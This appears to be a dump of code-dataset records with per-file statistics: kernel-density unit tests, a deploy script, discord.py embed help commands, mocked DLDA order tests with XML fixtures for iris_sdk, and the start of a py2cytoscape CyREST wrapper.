self.assertTrue(np.allclose(hp_values1/weight, hp_values2, 1e-4))
# simple test based on 68, 95, 99% rule
self.x_train = np.array([0.5])
for bw, w in ([0.5, 0.6827], [0.25, 0.9545], [1/6, 0.9973]):
hp_kernel = hp_kernels.Gaussian(data=self.x_train, bandwidth=bw, fix_boundary=True)
self.assertAlmostEqual(hp_kernel.weights[0], 1/w, delta=1e-4)
@unittest.skipIf(rapid_development, "test skipped to accelerate developing new tests")
def test_pdf_boundary_quadrature(self):
self.x_test = np.array([0,1,2,3])
for bw in [1e-2, 1e-1, 0.99]:
hp_kernel = hp_kernels.WangRyzinOrdinal(data=self.x_train, bandwidth=bw, num_values=4, fix_boundary=True)
hp_values = hp_kernel(self.x_test).mean(axis=0)
self.assertAlmostEqual(hp_values.sum(), 1, delta=1e-4)
@unittest.skipIf(rapid_development, "test skipped to accelerate developing new tests")
def test_sample(self):
    """Histogram of drawn samples must reproduce the kernel's pdf."""
    num_samples = 2**20
    for bw in [1e-1, 5e-1, 0.99]:
        hp_kernel = hp_kernels.WangRyzinOrdinal(data=self.x_train, bandwidth=bw, num_values=4, fix_boundary=True)
        samples = hp_kernel.sample(num_samples=num_samples)
        # FIX: np.histogram's `normed` kwarg was deprecated and then removed
        # (NumPy 1.24); `density=True` is the supported equivalent. With unit
        # bin widths here the two produce identical values.
        phat1, x = np.histogram(samples, density=True, bins=[-0.5, 0.5, 1.5, 2.5, 3.5])
        # Evaluate the kernel pdf at the bin centers for comparison.
        phat2 = hp_kernel((x[1:] + x[:-1])/2).mean(axis=0)
        for p1, p2 in zip(phat1, phat2):
            self.assertAlmostEqual(p1, p2, delta=5e-2)
# Run the test suite when this module is executed directly.
if __name__ == '__main__':
    unittest.main()
| 36.033639
| 141
| 0.719426
| 1,923
| 11,783
| 4.227769
| 0.095164
| 0.042435
| 0.04797
| 0.036162
| 0.876507
| 0.855966
| 0.852645
| 0.840221
| 0.8369
| 0.819434
| 0
| 0.040553
| 0.146143
| 11,783
| 326
| 142
| 36.144172
| 0.767518
| 0.057541
| 0
| 0.714953
| 0
| 0
| 0.059046
| 0
| 0
| 0
| 0
| 0
| 0.084112
| 1
| 0.102804
| false
| 0
| 0.037383
| 0
| 0.196262
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
db5859dd6b72238df119a5bd50931cc9b6a98bc9
| 81
|
py
|
Python
|
scripts/update_front_end.py
|
mattheweller/TokenFarm
|
f2f4accc121b29f280e740cc4dbedc207fb61f33
|
[
"MIT"
] | 1
|
2021-11-20T08:29:10.000Z
|
2021-11-20T08:29:10.000Z
|
scripts/update_front_end.py
|
mattheweller/TokenFarm
|
f2f4accc121b29f280e740cc4dbedc207fb61f33
|
[
"MIT"
] | null | null | null |
scripts/update_front_end.py
|
mattheweller/TokenFarm
|
f2f4accc121b29f280e740cc4dbedc207fb61f33
|
[
"MIT"
] | 1
|
2022-02-14T03:21:27.000Z
|
2022-02-14T03:21:27.000Z
|
from scripts.deploy import update_front_end
def main():
    # Script entry point: delegates to scripts.deploy.update_front_end.
    # NOTE(review): no __main__ guard — presumably invoked by a framework
    # runner (e.g. `brownie run`) that calls main() itself; confirm.
    update_front_end()
| 13.5
| 43
| 0.765432
| 12
| 81
| 4.833333
| 0.75
| 0.37931
| 0.482759
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.160494
| 81
| 5
| 44
| 16.2
| 0.852941
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
db6bfdadd7306c73645432b3d2935a0adf2ff718
| 103
|
py
|
Python
|
accepted/chennaipy/october/samplecode/minions/__init__.py
|
tasdikrahman/talks
|
bba44283e149ab27fb8cc2f6f8644adf9f2c8a11
|
[
"MIT"
] | 1
|
2017-04-16T06:59:02.000Z
|
2017-04-16T06:59:02.000Z
|
accepted/chennaipy/october/samplecode/minions/__init__.py
|
prodicus/talks
|
bba44283e149ab27fb8cc2f6f8644adf9f2c8a11
|
[
"MIT"
] | null | null | null |
accepted/chennaipy/october/samplecode/minions/__init__.py
|
prodicus/talks
|
bba44283e149ab27fb8cc2f6f8644adf9f2c8a11
|
[
"MIT"
] | 1
|
2019-10-26T00:28:07.000Z
|
2019-10-26T00:28:07.000Z
|
# minions/__init__.py
# Demo package initializer: the print makes the import-time side effect
# visible, showing exactly when Python executes __init__.py.
print("inside minions/__init__.py")
# Re-export Foo and Bar so callers can do `from minions import Foo, Bar`.
from .foo import Foo
from .bar import Bar
| 12.875
| 35
| 0.747573
| 16
| 103
| 4.3125
| 0.5625
| 0.318841
| 0.376812
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.145631
| 103
| 7
| 36
| 14.714286
| 0.784091
| 0.184466
| 0
| 0
| 0
| 0
| 0.320988
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0.333333
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
db91b5d0571ba472364cbad40dac989d29f41f85
| 1,511
|
py
|
Python
|
discoutils/help_cmds.py
|
Rishiraj0100/discoutils
|
67da54034bf5771d7e55627c2cdcddc9f72f19a4
|
[
"MIT"
] | 2
|
2021-04-09T03:27:43.000Z
|
2021-05-24T16:29:42.000Z
|
discoutils/help_cmds.py
|
Rishiraj0100/discoutils
|
67da54034bf5771d7e55627c2cdcddc9f72f19a4
|
[
"MIT"
] | null | null | null |
discoutils/help_cmds.py
|
Rishiraj0100/discoutils
|
67da54034bf5771d7e55627c2cdcddc9f72f19a4
|
[
"MIT"
] | 1
|
2021-03-20T14:23:28.000Z
|
2021-03-20T14:23:28.000Z
|
import discord
from discord.ext import commands
class MinimalEmbedHelp(commands.MinimalHelpCommand):
    """Minimal help command that renders each paginator page as an embed.

    Options (passed through to MinimalHelpCommand):
        embed_template: a discord.Embed subclass used to build each page
            (falls back to discord.Embed when absent or falsy).
        color: optional color applied to every embed.
    """

    def __init__(self, **options):
        self.options = options
        # Falsy template values (e.g. None) fall back to discord.Embed.
        self.embed_template = options.get("embed_template", discord.Embed) or discord.Embed
        if not issubclass(self.embed_template, discord.Embed):
            raise TypeError(f"Embed template must be a subclass of discord.Embed not {self.embed_template!r}")
        super().__init__(**options)

    async def send_pages(self):
        """Build one embed per paginator page and send each to the destination."""
        channel = self.get_destination()
        embeds = []
        for page in self.paginator.pages:
            e = self.embed_template(description=page)
            if self.options.get("color"):
                e.color = self.options.get("color")
            embeds.append(e)
        # BUG FIX: the original sent the *whole* list on every loop iteration
        # (`channel.send(embeds=embeds)`), duplicating all pages len(embeds)
        # times. Send each page's embed exactly once instead.
        for embed in embeds:
            await channel.send(embed=embed)
class DefaultEmbedHelp(commands.DefaultHelpCommand):
    """Default help command that renders each paginator page as an embed.

    Options (passed through to DefaultHelpCommand):
        embed_template: a discord.Embed subclass used to build each page
            (falls back to discord.Embed when absent or falsy).
        color: optional color applied to every embed.
    """

    def __init__(self, **options):
        self.options = options
        # CONSISTENCY FIX: mirror MinimalEmbedHelp's `or discord.Embed` so a
        # falsy template (e.g. embed_template=None) falls back instead of
        # crashing issubclass() with a non-class argument.
        self.embed_template = options.get("embed_template", discord.Embed) or discord.Embed
        if not issubclass(self.embed_template, discord.Embed):
            raise TypeError(f"Embed template must be a subclass of discord.Embed not {type(self.embed_template)!r}")
        super().__init__(**options)

    async def send_pages(self):
        """Build one embed per paginator page and send each to the destination."""
        channel = self.get_destination()
        embeds = []
        for page in self.paginator.pages:
            e = self.embed_template(description=page)
            if self.options.get("color"):
                e.color = self.options.get("color")
            embeds.append(e)
        # BUG FIX: the original sent the *whole* list on every loop iteration
        # (`channel.send(embeds=embeds)`), duplicating all pages len(embeds)
        # times. Send each page's embed exactly once instead.
        for embed in embeds:
            await channel.send(embed=embed)
| 36.853659
| 110
| 0.704831
| 197
| 1,511
| 5.253807
| 0.238579
| 0.150725
| 0.131401
| 0.096618
| 0.863768
| 0.863768
| 0.863768
| 0.863768
| 0.863768
| 0.863768
| 0
| 0
| 0.181337
| 1,511
| 40
| 111
| 37.775
| 0.836702
| 0
| 0
| 0.777778
| 0
| 0
| 0.138981
| 0.034414
| 0
| 0
| 0
| 0
| 0
| 1
| 0.055556
| false
| 0
| 0.055556
| 0
| 0.166667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
dba1ac1cb5ca95bcd1ee105cb06a942b6ca81e2a
| 18,904
|
py
|
Python
|
tests/test_dlda.py
|
NumberAI/python-bandwidth-iris
|
0e05f79d68b244812afb97e00fd65b3f46d00aa3
|
[
"MIT"
] | 2
|
2020-04-13T13:47:59.000Z
|
2022-02-23T20:32:41.000Z
|
tests/test_dlda.py
|
bandwidthcom/python-bandwidth-iris
|
dbcb30569631395041b92917252d913166f7d3c9
|
[
"MIT"
] | 5
|
2020-09-18T20:59:24.000Z
|
2021-08-25T16:51:42.000Z
|
tests/test_dlda.py
|
bandwidthcom/python-bandwidth-iris
|
dbcb30569631395041b92917252d913166f7d3c9
|
[
"MIT"
] | 5
|
2018-12-12T14:39:50.000Z
|
2020-11-17T21:42:29.000Z
|
#!/usr/bin/env python
import os
import sys
# For coverage.
# When executed as a plain script (no package context), add the repository
# root to sys.path so the `iris_sdk` package imports below still resolve.
if __package__ is None:
    sys.path.append(os.path.dirname(os.path.abspath(__file__)) + "/..")
from unittest import main, TestCase
import requests
import requests_mock
from iris_sdk.client import Client
from iris_sdk.models.account import Account
# Canned XML payloads served by the mocked HTTP layer in the tests below.
# Fixture for a single-DLDA GET: one order with one TN group, listing name
# and address populated.
XML_RESPONSE_DLDA_GET = (
    b"<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\" ?>"
    b"<DldaOrderResponse><DldaOrder>"
    b"<CustomerOrderId>5a88d16d-f8a9-45c5-a5db-137d700c6a22</CustomerOrderId>"
    b"<OrderCreateDate>2014-07-10T12:38:11.833Z</OrderCreateDate>"
    b"<AccountId>14</AccountId><CreatedByUser>jbm</CreatedByUser>"
    b"<OrderId>ea9e90c2-77a4-4f82-ac47-e1c5bb1311f4</OrderId>"
    b"<LastModifiedDate>2014-07-10T12:38:11.833Z</LastModifiedDate>"
    b"<ProcessingStatus>RECEIVED</ProcessingStatus><DldaTnGroups>"
    b"<DldaTnGroup><TelephoneNumbers>"
    b"<TelephoneNumber>2053778335</TelephoneNumber>"
    b"<TelephoneNumber>2053865784</TelephoneNumber></TelephoneNumbers>"
    b"<AccountType>BUSINESS</AccountType><ListingType>LISTED</ListingType>"
    b"<ListingName><FirstName>Joe</FirstName><LastName>Smith</LastName>"
    b"</ListingName><ListAddress>true</ListAddress><Address>"
    b"<HouseNumber>12</HouseNumber><StreetName>ELM</StreetName>"
    b"<City>New York</City><StateCode>NY</StateCode><Zip>10007</Zip>"
    b"<Country>United States</Country><AddressType>Dlda</AddressType>"
    b"</Address></DldaTnGroup></DldaTnGroups></DldaOrder>"
    b"</DldaOrderResponse>"
)
# Fixture for an order-history GET: three entries tracking the order from
# RECEIVED through PROCESSING to COMPLETE.
XML_RESPONSE_DLDA_HISTORY = (
    b"<?xml version=\"1.0\"?> <OrderHistoryWrapper><OrderHistory>"
    b"<OrderDate>2014-09-04T16:28:11.320Z</OrderDate>"
    b"<Note>The DL/DA request has been received</Note>"
    b"<Author>jbm</Author><Status>RECEIVED</Status></OrderHistory>"
    b"<OrderHistory><OrderDate>2014-09-04T16:28:18.742Z</OrderDate>"
    b"<Note>The DL/DA request is being processed by our 3rd party supplier"
    b"</Note><Author>jbm</Author><Status>PROCESSING</Status> </OrderHistory>"
    b"<OrderHistory><OrderDate>2014-09-05T19:00:17.968Z</OrderDate>"
    b"<Note>The DL/DA request is complete for all TNs</Note>"
    b"<Author>jbm</Author><Status>COMPLETE</Status></OrderHistory>"
    b"</OrderHistoryWrapper>"
)
# Fixture for the DLDA list GET: three order summaries (one FAILED, two
# RECEIVED).
XML_RESPONSE_DLDA_LIST = (
    b"<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\" ?>"
    b"<ResponseSelectWrapper><ListOrderIdUserIdDate>"
    b"<TotalCount>3</TotalCount><OrderIdUserIdDate>"
    b"<accountId>14</accountId><CountOfTNs>2</CountOfTNs>"
    b"<userId>team_ua</userId>"
    b"<lastModifiedDate>2014-07-07T10:06:43.427Z</lastModifiedDate>"
    b"<OrderType>dlda</OrderType>"
    b"<OrderDate>2014-07-07T10:06:43.427Z</OrderDate>"
    b"<orderId>37a6447c-1a0b-4be9-ba89-3f5cb0aea142</orderId>"
    b"<OrderStatus>FAILED</OrderStatus></OrderIdUserIdDate>"
    b"<OrderIdUserIdDate><accountId>14</accountId>"
    b"<CountOfTNs>2</CountOfTNs><userId>team_ua</userId>"
    b"<lastModifiedDate>2014-07-07T10:05:56.595Z</lastModifiedDate>"
    b"<OrderType>dlda</OrderType>"
    b"<OrderDate>2014-07-07T10:05:56.595Z</OrderDate>"
    b"<orderId>743b0e64-3350-42e4-baa6-406dac7f4a85</orderId>"
    b"<OrderStatus>RECEIVED</OrderStatus></OrderIdUserIdDate>"
    b"<OrderIdUserIdDate><accountId>14</accountId>"
    b"<CountOfTNs>2</CountOfTNs><userId>team_ua</userId>"
    b"<lastModifiedDate>2014-07-07T09:32:17.234Z</lastModifiedDate>"
    b"<OrderType>dlda</OrderType>"
    b"<OrderDate>2014-07-07T09:32:17.234Z</OrderDate>"
    b"<orderId>f71eb4d2-bfef-4384-957f-45cd6321185e</orderId>"
    b"<OrderStatus>RECEIVED</OrderStatus></OrderIdUserIdDate>"
    b"</ListOrderIdUserIdDate></ResponseSelectWrapper>"
)
# Fixture for the DLDA POST: same payload as XML_RESPONSE_DLDA_GET (the API
# echoes the created order back).
XML_RESPONSE_DLDA_POST = (
    b"<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\" ?>"
    b"<DldaOrderResponse><DldaOrder>"
    b"<CustomerOrderId>5a88d16d-f8a9-45c5-a5db-137d700c6a22</CustomerOrderId>"
    b"<OrderCreateDate>2014-07-10T12:38:11.833Z</OrderCreateDate>"
    b"<AccountId>14</AccountId><CreatedByUser>jbm</CreatedByUser>"
    b"<OrderId>ea9e90c2-77a4-4f82-ac47-e1c5bb1311f4</OrderId>"
    b"<LastModifiedDate>2014-07-10T12:38:11.833Z</LastModifiedDate>"
    b"<ProcessingStatus>RECEIVED</ProcessingStatus><DldaTnGroups>"
    b"<DldaTnGroup><TelephoneNumbers>"
    b"<TelephoneNumber>2053778335</TelephoneNumber>"
    b"<TelephoneNumber>2053865784</TelephoneNumber></TelephoneNumbers>"
    b"<AccountType>BUSINESS</AccountType><ListingType>LISTED</ListingType>"
    b"<ListingName><FirstName>Joe</FirstName><LastName>Smith</LastName>"
    b"</ListingName><ListAddress>true</ListAddress><Address>"
    b"<HouseNumber>12</HouseNumber><StreetName>ELM</StreetName>"
    b"<City>New York</City><StateCode>NY</StateCode><Zip>10007</Zip>"
    b"<Country>United States</Country><AddressType>Dlda</AddressType>"
    b"</Address></DldaTnGroup></DldaTnGroups></DldaOrder>"
    b"</DldaOrderResponse>"
)
class ClassDldaTest(TestCase):
    """Test DLDA orders.

    All HTTP traffic is intercepted with requests_mock; responses come from
    the XML_RESPONSE_* fixtures above, so no real service is contacted.
    """

    @classmethod
    def setUpClass(cls):
        # Dummy credentials/host: requests never leave the mock layer.
        cls._client = Client("http://foo", "bar", "bar", "qux")
        cls._account = Account(client=cls._client)

    @classmethod
    def tearDownClass(cls):
        del cls._client
        del cls._account

    def test_dlda_get(self):
        """Fetch a single DLDA order and check every deserialized field."""
        with requests_mock.Mocker() as m:
            dlda = self._account.dldas.create()
            dlda.id = "ea9e90c2-77a4-4f82-ac47-e1c5bb1311f4"
            url = self._client.config.url + dlda.get_xpath()
            m.get(url, content=XML_RESPONSE_DLDA_GET)
            dlda = self._account.dldas.get(dlda.id)
            self.assertEqual(dlda.id, "ea9e90c2-77a4-4f82-ac47-e1c5bb1311f4")
            self.assertEqual(dlda.customer_order_id,
                "5a88d16d-f8a9-45c5-a5db-137d700c6a22")
            self.assertEqual(dlda.order_create_date,
                "2014-07-10T12:38:11.833Z")
            self.assertEqual(dlda.account_id, "14")
            self.assertEqual(dlda.created_by_user, "jbm")
            self.assertEqual(dlda.order_id,
                "ea9e90c2-77a4-4f82-ac47-e1c5bb1311f4")
            self.assertEqual(dlda.last_modified_date,
                "2014-07-10T12:38:11.833Z")
            self.assertEqual(dlda.processing_status, "RECEIVED")
            # Nested TN-group structure from the fixture.
            grp = dlda.dlda_tn_groups.dlda_tn_group.items[0]
            self.assertEqual(
                grp.telephone_numbers.telephone_number.items,
                ["2053778335","2053865784"]
            )
            self.assertEqual(grp.account_type, "BUSINESS")
            self.assertEqual(grp.listing_type, "LISTED")
            self.assertEqual(grp.list_address, "true")
            lname = grp.listing_name
            self.assertEqual(lname.first_name, "Joe")
            self.assertEqual(lname.last_name, "Smith")
            addr = grp.address
            self.assertEqual(addr.city, "New York")
            self.assertEqual(addr.house_number, "12")
            self.assertEqual(addr.street_name, "ELM")
            self.assertEqual(addr.state_code, "NY")
            self.assertEqual(addr.zip, "10007")
            self.assertEqual(addr.country, "United States")
            self.assertEqual(addr.address_type, "Dlda")

    def test_dlda_list(self):
        """List DLDA orders and check the first summary's fields."""
        with requests_mock.Mocker() as m:
            url = self._client.config.url + self._account.dldas.get_xpath()
            m.get(url, content=XML_RESPONSE_DLDA_LIST)
            dldas = self._account.dldas.list()
            dlda = dldas.items[0]
            self.assertEqual(len(dldas.items), 3)
            self.assertEqual(dlda.id, "37a6447c-1a0b-4be9-ba89-3f5cb0aea142")
            self.assertEqual(dlda.account_id, "14")
            self.assertEqual(dlda.count_of_tns, "2")
            self.assertEqual(dlda.user_id, "team_ua")
            self.assertEqual(dlda.last_modified_date,
                "2014-07-07T10:06:43.427Z")
            self.assertEqual(dlda.order_type, "dlda")
            self.assertEqual(dlda.order_date, "2014-07-07T10:06:43.427Z")
            self.assertEqual(dlda.order_id, "37a6447c-1a0b-4be9-ba89-3f5cb0aea142")
            self.assertEqual(dlda.order_status, "FAILED")

    def test_dlda_post(self):
        """Create a DLDA order; check both local-only and posted creation."""
        with requests_mock.Mocker() as m:
            url = self._client.config.url + self._account.dldas.get_xpath()
            m.post(url, content=XML_RESPONSE_DLDA_POST)
            order_data = {
                "customer_order_id": "123",
                "dlda_tn_groups": {
                    "dlda_tn_group": [{
                        "telephone_numbers": {
                            "telephone_number": ["4352154856"]
                        },
                        "account_type": "RESIDENTIAL",
                        "listing_type": "LISTED",
                        "list_address": "true",
                        "listing_name": {
                            "first_name": "first name",
                            "first_name2": "first name2",
                            "last_name": "last name",
                            "designation": "designation",
                            "title_of_lineage": "title of lineage",
                            "title_of_address": "title of address",
                            "title_of_address2": "title of address2",
                            "title_of_lineage_name2":"title of lineage name2",
                            "title_of_address_name2":"title of address name2",
                            "title_of_address2_name2":
                                "title of address2 name2",
                            "place_listing_as": "place listing as"
                        },
                        "address": {
                            "house_prefix": "house prefix",
                            "house_number": "915",
                            "house_suffix": "house suffix",
                            "pre_directional": "pre directional",
                            "street_name": "street name",
                            "street_suffix": "street suffix",
                            "post_directional": "post directional",
                            "address_line2": "address line2",
                            "city": "city",
                            "state_code": "state code",
                            "zip": "zip",
                            "plus_four": "plus four",
                            "country": "country",
                            "address_type": "address type"
                        }
                    }]
                }
            }
            # create(..., False): build the object locally without POSTing —
            # the fields must round-trip from order_data unchanged.
            dlda = self._account.dldas.create(order_data, False)
            self.assertEqual(dlda.customer_order_id, "123")
            grp = dlda.dlda_tn_groups.dlda_tn_group.items[0]
            self.assertEqual(grp.telephone_numbers.telephone_number.items,
                ["4352154856"])
            self.assertEqual(grp.account_type, "RESIDENTIAL")
            self.assertEqual(grp.listing_type, "LISTED")
            self.assertEqual(grp.list_address, "true")
            name = grp.listing_name
            self.assertEqual(name.first_name, "first name")
            self.assertEqual(name.first_name2, "first name2")
            self.assertEqual(name.last_name, "last name")
            self.assertEqual(name.designation, "designation")
            self.assertEqual(name.title_of_lineage, "title of lineage")
            self.assertEqual(name.title_of_address, "title of address")
            self.assertEqual(name.title_of_address2, "title of address2")
            self.assertEqual(name.title_of_lineage_name2,
                "title of lineage name2")
            self.assertEqual(name.title_of_address_name2,
                "title of address name2")
            self.assertEqual(name.title_of_address2_name2,
                "title of address2 name2")
            self.assertEqual(name.place_listing_as, "place listing as")
            addr = grp.address
            self.assertEqual(addr.house_prefix, "house prefix")
            self.assertEqual(addr.house_number, "915")
            self.assertEqual(addr.house_suffix, "house suffix")
            self.assertEqual(addr.pre_directional, "pre directional")
            self.assertEqual(addr.street_name, "street name")
            self.assertEqual(addr.street_suffix, "street suffix")
            self.assertEqual(addr.post_directional, "post directional")
            self.assertEqual(addr.address_line2, "address line2")
            self.assertEqual(addr.city, "city")
            self.assertEqual(addr.state_code, "state code")
            self.assertEqual(addr.zip, "zip")
            self.assertEqual(addr.plus_four, "plus four")
            self.assertEqual(addr.country, "country")
            self.assertEqual(addr.address_type, "address type")
            # create(order_data): actually POSTs; the mock returns the
            # fixture, so the result reflects XML_RESPONSE_DLDA_POST, not
            # the request payload.
            dlda = self._account.dldas.create(order_data)
            self.assertEqual(dlda.customer_order_id,
                "5a88d16d-f8a9-45c5-a5db-137d700c6a22")
            self.assertEqual(dlda.order_create_date,
                "2014-07-10T12:38:11.833Z")
            self.assertEqual(dlda.account_id, "14")
            self.assertEqual(dlda.created_by_user, "jbm")
            self.assertEqual(dlda.order_id,
                "ea9e90c2-77a4-4f82-ac47-e1c5bb1311f4")
            self.assertEqual(dlda.last_modified_date,
                "2014-07-10T12:38:11.833Z")
            self.assertEqual(dlda.processing_status, "RECEIVED")
            grp = dlda.dlda_tn_groups.dlda_tn_group.items[0]
            self.assertEqual(grp.telephone_numbers.telephone_number.items,
                ["2053778335","2053865784"])
            self.assertEqual(grp.account_type, "BUSINESS")
            self.assertEqual(grp.listing_type, "LISTED")
            self.assertEqual(grp.list_address, "true")
            name = grp.listing_name
            self.assertEqual(name.first_name, "Joe")
            self.assertEqual(name.last_name, "Smith")
            addr = grp.address
            self.assertEqual(addr.city, "New York")
            self.assertEqual(addr.house_number, "12")
            self.assertEqual(addr.street_name, "ELM")
            self.assertEqual(addr.state_code, "NY")
            self.assertEqual(addr.zip, "10007")
            self.assertEqual(addr.country, "United States")
            self.assertEqual(addr.address_type, "Dlda")

    def test_dlda_put(self):
        """Build an order with a preset order_id, verify its xpath, then PUT."""
        order_data = {
            "order_id": "7802373f-4f52-4387-bdd1-c5b74833d6e2",
            "customer_order_id": "123",
            "dlda_tn_groups": {
                "dlda_tn_group": [{
                    "telephone_numbers": {
                        "telephone_number": ["4352154856"]
                    },
                    "account_type": "RESIDENTIAL",
                    "listing_type": "LISTED",
                    "list_address": "true",
                    "listing_name": {
                        "first_name": "first name",
                        "first_name2": "first name2",
                        "last_name": "last name",
                        "designation": "designation",
                        "title_of_lineage": "title of lineage",
                        "title_of_address": "title of address",
                        "title_of_address2": "title of address2",
                        "title_of_lineage_name2":"title of lineage name2",
                        "title_of_address_name2":"title of address name2",
                        "title_of_address2_name2": "title of address2 name2",
                        "place_listing_as": "place listing as"
                    },
                    "address": {
                        "house_prefix": "house prefix",
                        "house_number": "915",
                        "house_suffix": "house suffix",
                        "pre_directional": "pre directional",
                        "street_name": "street name",
                        "street_suffix": "street suffix",
                        "post_directional": "post directional",
                        "address_line2": "address line2",
                        "city": "city",
                        "state_code": "state code",
                        "zip": "zip",
                        "plus_four": "plus four",
                        "country": "country",
                        "address_type": "address type"
                    }
                }]
            }
        }
        # Local-only creation (no HTTP): fields must round-trip unchanged.
        dlda = self._account.dldas.create(order_data, False)
        self.assertEqual(dlda.customer_order_id, "123")
        self.assertEqual(dlda.order_id,
            "7802373f-4f52-4387-bdd1-c5b74833d6e2")
        grp = dlda.dlda_tn_groups.dlda_tn_group.items[0]
        self.assertEqual(grp.telephone_numbers.telephone_number.items,
            ["4352154856"])
        self.assertEqual(grp.account_type, "RESIDENTIAL")
        self.assertEqual(grp.listing_type, "LISTED")
        self.assertEqual(grp.list_address, "true")
        name = grp.listing_name
        self.assertEqual(name.first_name, "first name")
        self.assertEqual(name.first_name2, "first name2")
        self.assertEqual(name.last_name, "last name")
        self.assertEqual(name.designation, "designation")
        self.assertEqual(name.title_of_lineage, "title of lineage")
        self.assertEqual(name.title_of_address, "title of address")
        self.assertEqual(name.title_of_address2, "title of address2")
        self.assertEqual(name.title_of_lineage_name2,
            "title of lineage name2")
        self.assertEqual(name.title_of_address_name2,
            "title of address name2")
        self.assertEqual(name.title_of_address2_name2,
            "title of address2 name2")
        self.assertEqual(name.place_listing_as, "place listing as")
        addr = grp.address
        self.assertEqual(addr.house_prefix, "house prefix")
        self.assertEqual(addr.house_number, "915")
        self.assertEqual(addr.house_suffix, "house suffix")
        self.assertEqual(addr.pre_directional, "pre directional")
        self.assertEqual(addr.street_name, "street name")
        self.assertEqual(addr.street_suffix, "street suffix")
        self.assertEqual(addr.post_directional, "post directional")
        self.assertEqual(addr.address_line2, "address line2")
        self.assertEqual(addr.city, "city")
        self.assertEqual(addr.state_code, "state code")
        self.assertEqual(addr.zip, "zip")
        self.assertEqual(addr.plus_four, "plus four")
        self.assertEqual(addr.country, "country")
        self.assertEqual(addr.address_type, "address type")
        # The instance xpath must compose account + collection + id paths.
        self.assertEqual(dlda.get_xpath(),
            self._account.get_xpath() + self._account.dldas._xpath +
            dlda._xpath.format(dlda.id))
        with requests_mock.Mocker() as m:
            url = self._client.config.url + dlda.get_xpath()
            m.put(url, content = XML_RESPONSE_DLDA_GET)
            # save() must issue the PUT against the instance URL.
            dlda.save()
# Allow running this test module directly (python tests/test_dlda.py).
if __name__ == "__main__":
    main()
| 44.065268
| 83
| 0.597598
| 1,981
| 18,904
| 5.536598
| 0.130742
| 0.15454
| 0.072757
| 0.026258
| 0.870077
| 0.849836
| 0.839807
| 0.804158
| 0.795861
| 0.761214
| 0
| 0.067444
| 0.274492
| 18,904
| 429
| 84
| 44.065268
| 0.732264
| 0.002698
| 0
| 0.709945
| 0
| 0
| 0.364143
| 0.213774
| 0
| 0
| 0
| 0
| 0.312155
| 1
| 0.016575
| false
| 0
| 0.019337
| 0
| 0.038674
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
dbb198672a65768e575e0918d52623b322c29f9c
| 60,858
|
py
|
Python
|
py2cytoscape/cyrest/networks.py
|
g-simmons2/py2cytoscape
|
e2cd1c5d598e1da02f50273e958ddf574c523eb8
|
[
"MIT"
] | 97
|
2018-01-23T00:20:51.000Z
|
2022-03-11T05:01:01.000Z
|
py2cytoscape/cyrest/networks.py
|
g-simmons2/py2cytoscape
|
e2cd1c5d598e1da02f50273e958ddf574c523eb8
|
[
"MIT"
] | 64
|
2018-01-24T14:51:20.000Z
|
2022-02-21T01:05:02.000Z
|
py2cytoscape/cyrest/networks.py
|
g-simmons2/py2cytoscape
|
e2cd1c5d598e1da02f50273e958ddf574c523eb8
|
[
"MIT"
] | 25
|
2018-01-20T20:29:39.000Z
|
2021-04-09T17:28:58.000Z
|
from .base import *
class networks(object):
"""
cytoscape session interface as shown in CyREST's swagger documentation.
:param url: an url of the type 'http://' + host + ':' + str(port) + '/' + version + '/'.
"""
def __init__(self, url):
    """Remember both the commands endpoint and the bare API root.

    :param url: base URL of the form 'http://' + host + ':' + port + '/' + version + '/'.
    """
    # `__url` targets the commands namespace; `___url` is the raw root used
    # by the REST wrappers below.
    self.__url = '{0}commands/networks'.format(url)
    self.___url = url
def collapseGroup(self, networkId, groupNodeId, verbose=None):
    """Collapse the group `groupNodeId` inside network `networkId`.

    :param networkId: SUID of the Network
    :param groupNodeId: SUID of the Node representing the Group
    :param verbose: print more
    :returns: 204: Group collapsed; 500: Failed to collapse group
    """
    endpoint = '{0}networks/{1}/groups/{2}/collapse'.format(
        self.___url, networkId, groupNodeId)
    return api(url=endpoint, method="GET", verbose=verbose, parse_params=False)
def expandGroup(self, networkId, groupNodeId, verbose=None):
    """Expand the group `groupNodeId` inside network `networkId`.

    :param networkId: SUID of the Network
    :param groupNodeId: SUID of the Node representing the Group
    :param verbose: print more
